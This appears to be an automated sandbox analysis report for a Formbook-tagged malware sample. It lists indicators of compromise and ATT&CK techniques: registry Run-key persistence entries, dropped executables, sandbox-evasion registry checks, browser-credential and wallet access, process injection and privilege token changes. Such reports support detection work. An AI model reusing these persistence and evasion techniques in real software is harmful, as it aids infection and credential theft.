formbook | 64506751e65ec41605c04620d393cdf9338ce76d31d8b0868dbdfce88f086a03

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\WLKX0D0H5 = "C:\\Program Files (x86)\\Y8pyhfft\\lnz8vvkdnpkx.exe"	wlanext.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	wlanext.exe

Blocklisted process makes network request 7 IoCs

flow	pid	Process
30	4648	cmd.exe
41	4648	cmd.exe
46	4648	cmd.exe
57	4648	cmd.exe
59	4648	cmd.exe
81	4648	cmd.exe
92	4648	cmd.exe

Downloads MZ/PE file

Executes dropped EXE 42 IoCs

pid	Process
1344	setup_installer.exe
1952	setup_install.exe
2952	Tue192762f1cd058ddf8.exe
5056	Tue19879c4c0e.exe
3988	Tue19761b3b8d9d.exe
3304	Tue19411ac950924ec3f.exe
4948	Tue195c40958f528163.exe
4840	Tue19325eb008c0b950.exe
4828	Tue19c06f159e0ec.exe
4648	Tue19b4ef3b53293fe.exe
3316	Tue193858933525b62.exe
4896	Tue19c1338f41ab.exe
2520	Tue19f51bcd77a.exe
3104	Tue19150ee2be694c8a4.exe
3812	Tue1969586bcbf58493.exe
4452	Tue1993b3f72c.exe
3332	Tue19c78ded4d176ac.exe
3852	Tue19879c4c0e.tmp
5188	Tue19879c4c0e.exe
5404	Tue19879c4c0e.tmp
5684	hz2zZEE1IO8UL8KkUIl_DiwJ.exe
5740	8274515.exe
5552	Tue19f51bcd77a.exe
5580	Tue195c40958f528163.exe
5560	Tue19761b3b8d9d.exe
6012	~Xy1GPomKV09sC.Exe
5832	Tue19f51bcd77a.exe
2052	4775154.exe
440	bogAMCgr_ceyHDpTDqaFFCso.exe
5232	lmuaIti549S4IlfLGjOQ62Vi.exe
6116	Tue19f51bcd77a.exe
4684	OXLD9voH55f6gEm9L6axlvDX.exe
904	PzZpKoEf4kqLrhhG_T7hkMOE.exe
5384	dKb7nc_82MUnYJcIwvnENgPK.exe
3552	Xhhrp4rIfn8tBtFfUngVP_kE.exe
2288	6218320.exe
5948	control.exe
5960	435056.exe
3504	8581712.exe
1540	RxAPuFNW.exe
4832	WinHoster.exe
2564	lnz8vvkdnpkx.exe

Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4775154.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4775154.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	OXLD9voH55f6gEm9L6axlvDX.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	OXLD9voH55f6gEm9L6axlvDX.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6218320.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6218320.exe

Loads dropped DLL 13 IoCs

pid	Process
1952	setup_install.exe
1952	setup_install.exe
1952	setup_install.exe
1952	setup_install.exe
1952	setup_install.exe
3852	Tue19879c4c0e.tmp
5404	Tue19879c4c0e.tmp
468	rundll32.exe
4700	msiexec.exe
4700	msiexec.exe
6000	rundll32.exe
6000	rundll32.exe
3572	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	435056.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6218320.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4775154.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	OXLD9voH55f6gEm9L6axlvDX.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com
4	ipinfo.io
37	ipinfo.io
105	ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
2052	4775154.exe
4684	OXLD9voH55f6gEm9L6axlvDX.exe
2288	6218320.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 4948 set thread context of 5580	4948	Tue195c40958f528163.exe	127
PID 3988 set thread context of 5560	3988	Tue19761b3b8d9d.exe	128
PID 2520 set thread context of 6116	2520	Tue19f51bcd77a.exe	135
PID 440 set thread context of 3220	440	bogAMCgr_ceyHDpTDqaFFCso.exe	29
PID 5792 set thread context of 3220	5792	wlanext.exe	29

Drops file in Program Files directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Y8pyhfft\lnz8vvkdnpkx.exe	Explorer.EXE
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	dKb7nc_82MUnYJcIwvnENgPK.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	dKb7nc_82MUnYJcIwvnENgPK.exe
File opened for modification	C:\Program Files (x86)\Y8pyhfft\lnz8vvkdnpkx.exe	wlanext.exe
File opened for modification	C:\Program Files (x86)\Y8pyhfft	Explorer.EXE
File created	C:\Program Files (x86)\Y8pyhfft\lnz8vvkdnpkx.exe	Explorer.EXE

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 7 IoCs

pid	pid_target	Process	procid_target
5156	1952	WerFault.exe	80
3236	4648	WerFault.exe	102
2264	4828	WerFault.exe	109
6028	3552	WerFault.exe	146
5648	5232	WerFault.exe	138
416	3104	WerFault.exe	110
3448	4896	WerFault.exe	107

Checks processor information in registry 2 TTPs 51 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
4508	schtasks.exe
2620	schtasks.exe

Enumerates system info in registry 2 TTPs 14 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
6060	taskkill.exe
5224	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\Registry\User\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	wlanext.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2660	powershell.exe
2660	powershell.exe
2924	powershell.exe
2924	powershell.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe
3812	Tue1969586bcbf58493.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3220	Explorer.EXE

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
440	bogAMCgr_ceyHDpTDqaFFCso.exe
440	bogAMCgr_ceyHDpTDqaFFCso.exe
440	bogAMCgr_ceyHDpTDqaFFCso.exe
5792	wlanext.exe
5792	wlanext.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeAssignPrimaryTokenPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeLockMemoryPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeIncreaseQuotaPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeMachineAccountPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeTcbPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeSecurityPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeTakeOwnershipPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeLoadDriverPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeSystemProfilePrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeSystemtimePrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeProfSingleProcessPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeIncBasePriorityPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeCreatePagefilePrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeCreatePermanentPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeBackupPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeRestorePrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeShutdownPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeDebugPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeAuditPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeSystemEnvironmentPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeChangeNotifyPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeRemoteShutdownPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeUndockPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeSyncAgentPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeEnableDelegationPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeManageVolumePrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeImpersonatePrivilege	4648	Tue19b4ef3b53293fe.exe
Token: SeCreateGlobalPrivilege	4648	Tue19b4ef3b53293fe.exe
Token: 31	4648	Tue19b4ef3b53293fe.exe
Token: 32	4648	Tue19b4ef3b53293fe.exe
Token: 33	4648	Tue19b4ef3b53293fe.exe
Token: 34	4648	Tue19b4ef3b53293fe.exe
Token: 35	4648	Tue19b4ef3b53293fe.exe
Token: SeDebugPrivilege	2660	powershell.exe
Token: SeDebugPrivilege	2924	powershell.exe
Token: SeDebugPrivilege	3332	Tue19c78ded4d176ac.exe
Token: SeDebugPrivilege	3304	Tue19411ac950924ec3f.exe
Token: SeRestorePrivilege	5156	WerFault.exe
Token: SeBackupPrivilege	5156	WerFault.exe
Token: SeDebugPrivilege	6060	taskkill.exe
